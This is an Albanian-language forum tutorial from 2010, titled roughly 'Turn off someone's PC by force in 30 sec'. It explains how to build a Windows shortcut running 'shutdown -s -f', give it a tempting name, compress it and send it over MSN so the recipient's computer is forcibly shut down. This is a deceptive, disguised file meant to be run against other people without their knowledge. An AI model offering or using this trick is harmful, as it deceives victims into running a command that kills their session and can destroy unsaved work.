Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...

Powered By:Valmir Shala
 
ForumForum  PortalPortal  Latest imagesLatest images  KërkoKërko  RegjistrohuRegjistrohu  identifikimi  

 

 Fike dikujt pc me fore per 30 sec

Shko poshtë 
AutoriMesazh
noah~hack
Admin
noah~hack


Numri i postimeve : 275
Join date : 24/01/2010
Age : 29

Fike dikujt pc me fore per 30 sec Empty
MesazhTitulli: Fike dikujt pc me fore per 30 sec   Fike dikujt pc me fore per 30 sec EmptySun Feb 14, 2010 9:03 pm

1.kliko dikund ne hapsir te tastin e djatht te mausit
2.new
3.shortcut
4.shutdown -s -f
5.ok
6. ja leni nji emer per ma hanger dikush foren
7. nese don e kompreseon me ja que dikujt per mes msn
8.dhe per 30 sekond pc-se i behete shutdown........
(mos e provo ne pc tande sepse mun me ta fik pc ...
Mbrapsht në krye Shko poshtë
http://www.v-shala.tk
 
Fike dikujt pc me fore per 30 sec
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...  :: Tutoriale&Mesime :: Tutoriale&Mesime-
Kërce tek: